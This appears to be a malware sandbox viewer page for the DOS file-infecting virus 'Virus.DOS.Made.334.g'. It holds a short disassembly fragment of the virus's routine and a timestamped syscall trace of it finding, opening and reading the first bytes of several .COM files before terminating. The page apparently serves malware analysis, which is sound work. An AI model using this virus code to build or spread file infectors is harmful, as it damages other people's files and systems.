Sample viewer

vx.netlux.org/Virus.DOS.Made.334.g

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:59:31.840835945Z 44 PC: 12ab9 | Get time 0x12ab9: cmp word ptr [si + 0x11b], 0
0x12abe: je 0x12acc
0x12ac0: cmp word ptr [si + 0x11c], 0
0x12ac5: je 0x12acc
0x12ac7: cmp dh, 0xf
0x12aca: jle 0x12ada
0x12acc: cmp dl, 0
0x12acf: je 0x12ab5
0x12ad1: cmp dh, 0
0x12ad4: je 0x12ab5
0x12ad6: mov word ptr [si + 0x11b], dx
0x12ada: mov bp, word ptr [si + 0x245]
0x12ade: add bp, 0x103
0x12ae2: lea dx, word ptr [si + 0x247]
0x12ae6: sub cx, cx
0x12ae8: mov ah, 0x4e
0x12aea: int 0x21
0x12aec: jb 0x12b6a
0x12aee: mov dx, 0x9e
0x12af1: mov ax, 0x3d02
2018-12-17T22:59:31.84369575Z 78 PC: 12aec | Find first file
2018-12-17T22:59:31.850882536Z 61 PC: 12af6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:59:31.858947753Z 63 PC: 12b73 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:31.866259054Z 79 PC: 12aec | Find next file
2018-12-17T22:59:31.869795199Z 61 PC: 12af6 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:59:31.876871428Z 63 PC: 12b73 | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:59:31.883527748Z 79 PC: 12aec | Find next file
2018-12-17T22:59:31.887214186Z 61 PC: 12af6 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:59:31.894880193Z 63 PC: 12b73 | Read file or device (Read 3 bytes on handle 7)
2018-12-17T22:59:31.902649445Z 79 PC: 12aec | Find next file
2018-12-17T22:59:31.906637279Z 61 PC: 12af6 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:59:31.913731101Z 63 PC: 12b73 | Read file or device (Read 3 bytes on handle 8)
2018-12-17T22:59:31.920886328Z 79 PC: 12aec | Find next file
2018-12-17T22:59:31.924594627Z 61 PC: 12af6 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:59:31.932182538Z 63 PC: 12b73 | Read file or device (Read 3 bytes on handle 9)
2018-12-17T22:59:31.939773394Z 79 PC: 12aec | Find next file
2018-12-17T22:59:31.94362352Z 61 PC: 12af6 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:59:31.950608567Z 63 PC: 12b73 | Read file or device (Read 3 bytes on handle 10)
2018-12-17T22:59:31.957324699Z 79 PC: 12aec | Find next file
2018-12-17T22:59:31.961010886Z 61 PC: 12af6 | Open file (Filename = 'PAH.COM')
2018-12-17T22:59:31.969065684Z 63 PC: 12b73 | Read file or device (Read 3 bytes on handle 11)
2018-12-17T22:59:31.976109302Z 79 PC: 12aec | Find next file
2018-12-17T22:59:31.979956773Z 61 PC: 12af6 | Open file (Filename = 'TEST.COM')
2018-12-17T22:59:31.987179306Z 63 PC: 12b73 | Read file or device (Read 3 bytes on handle 12)
2018-12-17T22:59:31.990299129Z 66 PC: 12b73 | Move file pointer
2018-12-17T22:59:31.992456153Z 63 PC: 12b73 | Read file or device (Read 2 bytes on handle 12)
2018-12-17T22:59:31.996023798Z 79 PC: 12aec | Find next file
2018-12-17T22:59:31.999125868Z 76 PC: 12a57 | Terminate with return code (Return code = '1')